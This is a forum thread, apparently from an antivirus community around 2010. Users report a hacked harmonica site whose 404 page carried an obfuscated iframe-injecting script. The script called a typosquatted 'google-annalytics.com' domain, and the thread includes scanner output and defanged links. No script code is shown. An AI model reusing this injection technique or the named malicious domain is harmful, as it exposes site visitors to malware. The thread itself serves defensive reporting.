Trojan Blocked HTML IFRAME

Hi,

Just browsed into Harptabs.com, a harmonica resource, and Avast blocked a Trojan, HTML IFRAME JQ TRJ
just thought I’d pass it on…
(the warning, not the trojan :))

VirusTotal - unp211969873.tmp - 5/41
http://www.virustotal.com/analisis/2c38cae2223f02e81f7ce5f36343ea8e93c76e56f43b8cf38a612c443b991db4-1276554949

This page seems to be
http://www.UnmaskParasites.com/security-report/?page=www.harptabs.com

The site appears to have been hacked in the form of a 404 error page having been hacked to include an obfuscated script tag after the closing HTML tag (image1) a standards no, no and highly suspect.

This is a common trick where it can have a reference to a file or image on the page which doesn’t exist and this causes a custom 404 error page to be displayed.

The obfuscated script creates an iframe tag and tries to run a cgi script on a site posing as google-analytics.com see image2 for the de-obfuscated script, the site note the nn in the domain name (only difference in real name). This is reported an an attack site (image3) and doesn’t have a very good rep, see http://www.mywot.com/en/scorecard/google-annalytics.com.

At the moment the site is given as clean here: 2010-06-13 16:21:45 (GMT 1)
Website harptabs.com
Domain Hash 895195f2cf995e77aafddd79524bb6ff
IP Address 207.58.130.65 [SCAN]
IP Hostname srv.maiavps.com
IP Country US (United States)
AS Number 25847
AS Name SERVINT - ServInt
Detections 0 / 20 (0 %)
Status CLEAN

Here we checked the iFrames there:
(Level: 0) Url checked:
http://wXw.harptabs.com
Google code detected (Ads, not a cheater)
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
type=text/javascript htxp://pagead2.googlesyndication.com/pagead/show_ads.js
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
htxp://www.google.com/coop/cse/brand?form=cse-search-box&lang=en
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
htxp://pagead2.googlesyndication.com/pagead/show_ads.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (iframe source)
htxp://pagead2.googlesyndication.com/pagead/+$(aa(c))+
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
htxp://www.windowslivetranslator.com/translatepagelink.aspx?pl=en
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
type=text/javascript htxp://pagead2.googlesyndication.com/pagead/show_ads.js
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
htxp://pagead2.googlesyndication.com/pagead/show_ads.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (iframe source)
htxp://pagead2.googlesyndication.com/pagead/+$(aa(c))+
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
htxp://pagead2.googlesyndication.com/pagead/show_ads.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (iframe source)
htxp://pagead2.googlesyndication.com/pagead/+$(aa(c))+
Blank page / could not connect
No ad codes identified

The blank page/could not connect are suspicious: (referer=pagead2.googlesyndication.com/pagead/show_ads.js)failure: HTTP Error 404: Not Found) could mean the page has now been cleansed…
or has become unavailable…
Source of the hack: http://blog.unmaskparasites.com/2009/03/26/google-analytics-is-an-intermediary-in-malware-distribution/
more links via http://www.unmaskparasites.com/web-page-options/?url=http%3A//google-annalytics.com
and
http://blog.unmaskparasites.com/2009/03/26/google-analytics-is-an-intermediary-in-malware-distribution/

polonus

It might be given as clean, but that certainly isn’t the case.

The 404 error page is a hacked page, all you need to trigger that is to delete the favicon.ico file or insert another link to a non-existent image, etc.

The problem is that many of these so called analysis sites are well behind avast, as none of them are detecting the obfuscated script, creating an iframe tag and running a cgi script on what is a malicious site.

Hi DavidR,

So certainly malicious as here in this example: htxp://jsunpack.jeek.org/dec/go?report=4763561f9a382a64263a17f5d80e386fb53d9a51
If the icon comes from the website and you trust that site, you can assume it is safe. If it comes from an unknown source, consider it malicious,

polonus

I posted an image of the de-obfuscated script form the jsunpack.jeek.org in my first reply rather than post a link which would alert if you changed the x to view the page, there are many in the forums who are too curious and why I post images ;D

It doesn’t matter where the image comes from, assuming we are even able to find what is missing that would be triggering the 404 error page which is hacked. So we can’t make any assumption it is safe, trust has nothing to do with it as the site is currently hacked.

Until that 404 error page is cleaned and the vulnerability which allowed the site to be hacked is closed it isn’t safe and we can be thankful that avast is on to it.